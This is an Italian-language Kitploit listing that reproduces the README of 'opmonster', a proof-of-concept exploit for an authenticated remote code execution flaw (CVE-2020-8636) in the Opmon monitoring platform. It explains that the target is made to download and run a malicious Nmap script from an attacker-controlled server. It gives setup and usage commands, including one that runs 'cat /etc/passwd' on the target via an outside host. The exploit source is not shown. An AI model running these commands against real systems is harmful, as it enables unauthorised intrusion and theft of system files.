Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
opmonster — CVE-2020-8636 exploit di esecuzione remota di codice autenticata per Opmon | Kitploit
Strumenti/GitHubGitHub/phor3nsic/opmonster
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubphor3nsic/opmonster

opmonster

CVE-2020-8636 exploit di esecuzione remota di codice autenticata per Opmon

Vedi Repository
21 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

OpMonster

CVE-2020-8636 — exploit di esecuzione remota di codice con autenticazione per Opmon

Informazioni • Installazione • Utilizzo • Licenza

language last commit license stars

OpMonster

Informazioni

OpMonster è un exploit proof-of-concept per CVE-2020-8636, una vulnerabilità di esecuzione remota di codice nella piattaforma di monitoraggio Opmon. Sfrutta l'endpoint nettools.php, che consente di eseguire Nmap con opzioni --script arbitrarie. L'exploit fa sì che Opmon scarichi uno script Nmap .nse dannoso da un server sotto il tuo controllo (tramite http-fetch), lo depositi in /tmp, poi lo esegua per lanciare il tuo comando sul target e ne stampi l'output.

Scoperto e sviluppato da @phor3nsic. Maggiori dettagli: Tre CVE su Opmon.

Installazione

root@kitploit:~
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests

Utilizzo

Per prima cosa, avvia un server web su un host raggiungibile dal target, in una directory da cui lo script .nse generato possa essere scaricato (l'exploit scrive lo script nella directory corrente):

root@kitploit:~
php -S 0.0.0.0:1337

Poi esegui l'exploit con quattro argomenti posizionali:

root@kitploit:~
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"

L'exploit si interrompe con un messaggio se il target non scarica lo script ("not vulnerable", ovvero non vulnerabile) o non riesce a stabilire una connessione in uscita verso il tuo server.

Disclaimer

Solo per test di sicurezza autorizzati e a scopo didattico. Sei responsabile dell'uso che ne fai.

Licenza

MIT © phor3nsic

Scarica lo strumento
ArgomentoDescrizione
HOSTURL di base Opmon del target (es. https://vulnhost.com)
LHOSTHost del tuo server che serve lo script .nse
LPORTPorta del tuo server
CMDComando da eseguire sul target